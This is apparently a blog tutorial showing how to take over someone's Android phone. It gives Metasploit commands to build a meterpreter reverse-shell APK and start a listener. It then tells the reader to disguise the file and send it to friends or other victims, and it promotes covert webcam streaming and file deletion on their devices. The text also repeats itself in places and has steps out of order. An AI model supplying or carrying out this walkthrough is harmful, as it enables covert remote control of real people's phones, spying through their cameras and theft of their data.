Hello ! everyone welcome to N2E .
This tutorial I'm going to teach and explain ,how to hack an Android phone with kali linux remotely.
There are many tutorials of this kind of hack, but I just want to share to someone who interesting and not yet done this process.( Still some of you may done this before. )
Step 1: Turn on your Kali-linux
Step 2: Open new terminal
After it loads(it will take time), load the multi-handler exploit by typing : use exploit/multi/handler
then set up a reverse payload by type a command : set payload android/meterpreter/reverse_tcp
and then set LHOST by type a command : set LHOST ( your IP address that you assigned to the payload file in step 1, this can hack in LAN or if you want to through the internet you can use your public/external IP address)
This tutorial I'm going to teach and explain ,how to hack an Android phone with kali linux remotely.
There are many tutorials of this kind of hack, but I just want to share to someone who interesting and not yet done this process.( Still some of you may done this before. )
Step 1: Turn on your Kali-linux
- Open the terminal and create the payload file
- You can do this by type a command :
- msfpayload android/meterpreter/reverse_tcp LHOST=(your ip address) LPORT= 443 R> /root/file_name.apk (replace file_name with the name you want, and don't forget to give .apk after your file name, because the file that install in android is .apk extension )
- If you don't know your IP address you can find it by type a command: ipconfig
- You can also hack android on WAN through Interet by using your Public/External IP in the LHOST
- After you done this step you can find the file payload that you had created under file name that you had given in the root directory.
Step 2: Open new terminal
- You have to make sure that you have already checked your payload file whether it created or not.
- Then in this new terminal type a command : msfconsole
- wait until you see the the terminal load like the following picture :
Step 3: Set up a listener
Step 4: Exploit
- At the last type a command : exploit
- and then it time to do a task with your payload file
- Send your file to someone or your friends by upload it to dropbox, 4shared or another method that you can imagine. after upload your file to the internet you can send a link to the victim by telling them that is the file of something.....( remember you should name your file properly so the victim would easily get into our control by your file name)
- until the file had been install on the victim phone, since you now can control their phone remotely.
- remember the step of allowance to install the app from unknown source should enable if not the security of the android phone to allow the trojan/payload file to install.
- and when the victim click install......
Step 5: Boom
- There will the meterpreter prompt load ( sending staged (43567byte) to 192.168.1.224) like that
- so it mean the victim had clicked install the file
- And then you can control their phone by use some function or method in the msfconsole by type command : help you will see many function checked and try by your own ( example like command : webcam_stream to open the victim camera......)
-----------------------------------------------HACKED---------------------------------------------------
NOTE : There is a similar type of hacking like this to hack the computer, and you can not use this method to hack computer.
The next tutorial I'll show you how to hack window or tutorials to use some fun command function while you controlling someone device. like download or upload file to their mobile, delete some file, open camera without let them know that their camera is being capture a video or pictures.......
So now enjoy your hacking and wait for another tutorials.
How to Hack Android With Kali-Linux (Remotely)
Reviewed by Unknown
on
4:45:00 AM
Rating:
No comments:
Thank for comment